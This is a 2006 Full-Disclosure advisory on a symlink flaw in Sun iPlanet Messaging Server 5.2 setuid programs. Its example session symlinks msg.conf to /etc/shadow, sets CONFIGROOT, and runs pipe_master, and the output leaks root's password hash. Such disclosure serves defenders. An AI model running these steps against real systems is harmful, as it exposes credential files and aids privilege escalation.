[Full-disclosure] Sun iPlanet Messaging Server 5.2 root password compromise

2006-06-15T00:00:00
ID SECURITYVULNS:DOC:13204
Type securityvulns
Reporter Securityvulns
Modified 2006-06-15T00:00:00

Description

Summary

Date: 14 Jun 2006 Vendor: Sun Microsystems, Inc. Name: iPlanet Messaging Server Version: 5.2 HotFix 1.16 (built May 14 2003) Vuln: msg.conf symlink attack Severity: high

Software description

The iPlanet Messaging Server is a software product that provides a centralized location for the exchange of information through the sending and receiving of messages. The product is designed for telecommunications providers, service providers, and enterprises that offer messaging capabilities to employees, partners, and customers. The iPlanet Messaging Server delivers a Web-based messaging platform capable of serving tens of millions of users, and also provides value-added differentiated services, including outsourcing, wireless ,and unified messaging services.

Vulnerability desciption

Setuid programs part of the iPlanet Messaging Server try to read the configuration file msg.conf. If the environment variable CONFIGROOT is set, the configuration is read from that directory. A symlink attack is possible, and as a result it is possible to read the first line of any file with uid=0.

Example

test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris test@sunbox:/tmp$ test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master -rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master test@sunbox:/tmp$ test@sunbox:/tmp$ ln -s /etc/shadow msg.conf test@sunbox:/tmp$ test@sunbox:/tmp$ export CONFIGROOT=. test@sunbox:/tmp$ test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master [14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed by '='; line=root:qW1HFEa1MCD0w:11821:::::: ERROR: Configuration database initialization failed - see default logfile test@sunbox:/tmp$

Vulnerable

iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)

php0t / zorro.hu www.zorro.hu


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/